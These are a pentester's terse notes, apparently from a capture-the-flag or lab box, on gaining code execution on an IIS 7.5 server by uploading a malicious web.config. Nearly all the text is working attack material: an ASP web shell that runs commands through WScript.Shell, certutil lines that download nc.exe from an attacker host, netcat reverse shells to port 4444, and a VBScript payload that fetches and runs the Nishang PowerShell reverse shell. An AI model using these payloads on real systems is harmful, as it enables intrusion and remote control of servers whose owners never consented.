IIS

80 http Microsoft IIS httpd 7.5

IIS 7.5 = Windows 2008 R2

test.txt        ..fail
test.asp        ..fail
test.aspx       ..fail
test.jpg        ..ok
web.config      ..ok - we can exploit

-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp

-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo

-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>